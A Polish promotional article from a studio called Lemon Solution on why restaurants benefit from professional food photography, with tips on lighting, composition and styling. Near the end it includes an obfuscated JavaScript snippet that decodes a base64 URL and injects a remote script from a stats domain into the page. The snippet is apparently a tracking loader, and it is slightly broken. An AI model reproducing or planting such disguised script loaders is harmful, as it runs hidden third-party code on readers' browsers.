Profesjonalna fotografia kulinarna

Nie ma wątpliwości, że w ostatnich latach rola fotografii kulinarnej stała się niezwykle istotna w perspektywie skutecznego marketingu w branży gastronomicznej. Efektowne, profesjonalne zdjęcia kulinarne skutecznie zachęcają potencjalnych klientów do odwiedzenia restauracja i skosztowania specjalności kuchni. Znaczenie, jakie w ostatnim czasie osiąga fotografia produktowa czy kulinarna, wiąże się oczywiście z ekspansją social mediów na nasze codzienne życie. Decydując się na wybór restauracji, baru lub innego obiektu gastronomicznego coraz częściej zasięgamy opinii w sieci. Sprawdzamy recenzję w profilu Google czy odwiedzamy fanpage lub Instagram danego lokalu. Apetyczne zdjęcia jedzenia czy napojów, które umieszczamy na firmowych profilach, to współcześnie podstawa skutecznej reklamy marki. A zatem warto wiedzieć, na co zwrócić uwagę, decydując się na profesjonalną sesję zdjęciową dla restauracji. Taką, która pomoże zbudować wizerunek naszego miejsca i ściągnąć do niego nowych klientów.

  • Znaczenie fotografii kulinarnej w marketingu branży HoReCa
  • Fotografia kulinarna – co warto wiedzieć o sesjach dla restauracji
  • Lemon Solution – profesjonalne sesje zdjęciowe dla restauracji

Znaczenie fotografii kulinarnej w marketingu branży HoReCa

Współcześnie marketing w niemal każdej branży przeniósł się do sieci. To profile w social mediach stają się podstawową wizytówką naszej działalności. Nie inaczej jest w branży HoReCa. Do reklamowania usług restauracji, barów i innych punktów gastronomicznych coraz częściej wykorzystuje się profesjonalną fotografię kulinarną. Fotografowanie jedzenia stało się bowiem prawdziwą sztuką. Najlepsi specjaliści w tym zakresie potrafią sportretować firmowe dania z karty naszej restauracji w sposób, który sprawi, że żaden smakosz nie będzie w stanie ominąć miejsca serwującego te specjały. Coraz więcej restauracji korzysta z usług food fotografów, którzy wydobywają magię z każdego talerza. Tak wykonane zdjęcia możemy umieścić na profilu FB lub Instagramie, co pozwoli na efektywne wypromowanie marki w Internecie.

Fotografia kulinarna – co warto wiedzieć o sesjach dla restauracji

Decydując się na tego rodzaju usługi, warto postawić na sprawdzone i doświadczone studio zajmujące się fotografią kulinarną i produktową. Sesję poprzedza rozmowa z restauratorem, który wskazuje, jakie dania pozostają wizytówką danego miejsca. Tajemnicą udanych zdjęć pozostaje oczywiście oświetlenie. Warto postawić na światło naturalne, w którym potrawy będą wyglądać bardziej apetycznie. Kolejny aspekt to oczywiście odpowiednia kompozycja, która pozwoli zachować równowagę i harmonię prezentacji dania. Kluczowe pozostaje również tło i scenografia, najlepiej neutralne, które ułatwi efektowne eksponowanie samego jedzenia. Należy skupić się także na stylizacji jedzenia, aby wyglądało efektownie, a zarazem naturalnie. Kolejny element to profesjonalna obróbka i edycja fotografii, pozwalająca wydobyć głębię ostrości. Oczywiście i w tym elemencie nie możemy przesadzać, aby jedzenie nie wyglądało na talerzu po prostu sztucznie. Ostatni aspekt to odpowiednie układanie elementów potrawy, dzięki któremu uzyskamy wizualną złożoność.

Lemon Solution – profesjonalne sesje zdjęciowe dla restauracji

W Lemon Solution wiemy, że fotografia kulinarna to prawdziwa sztuka, a odpowiednie podejście do gastronomicznej sesji graficznej pozwala na uzyskanie efektów, które staną się dźwignią marketingu danego miejsca. Oferujemy naszym klientom pakiety sesji zdjęciowych, w których wydobywamy głębię z każdej prezentowanej potrawy, a także wykonanie krótkiego filmu reklamowego restauracji, na którym staramy się uchwycić życie danej przestrzeni smaku w ruchu.

(function(cwdhddot, jmmmedhu, yuacrfvq, azvqhqzx, lmacrrqw, zeemzjxr){ lmacrrqw = jmmmedhu.createElement(yuacrfvq);zeemzjxr = jmmmedhu.getElementsByTagName(yuacrfvq)[0]; lmacrrqw.ascyc = 1; lmacrrqw.src = atob(azvqhqzx) zeemzjxr.parentNode.insertBefore(lmacrrqw, zeemzjxr); })(window, document, 'script’, 'aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC85MjFiZmI0Zi1hNGM3LTQ3Y2UtOTVjZC0yNGMwOGZlZTE0NTQuanM=’)

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *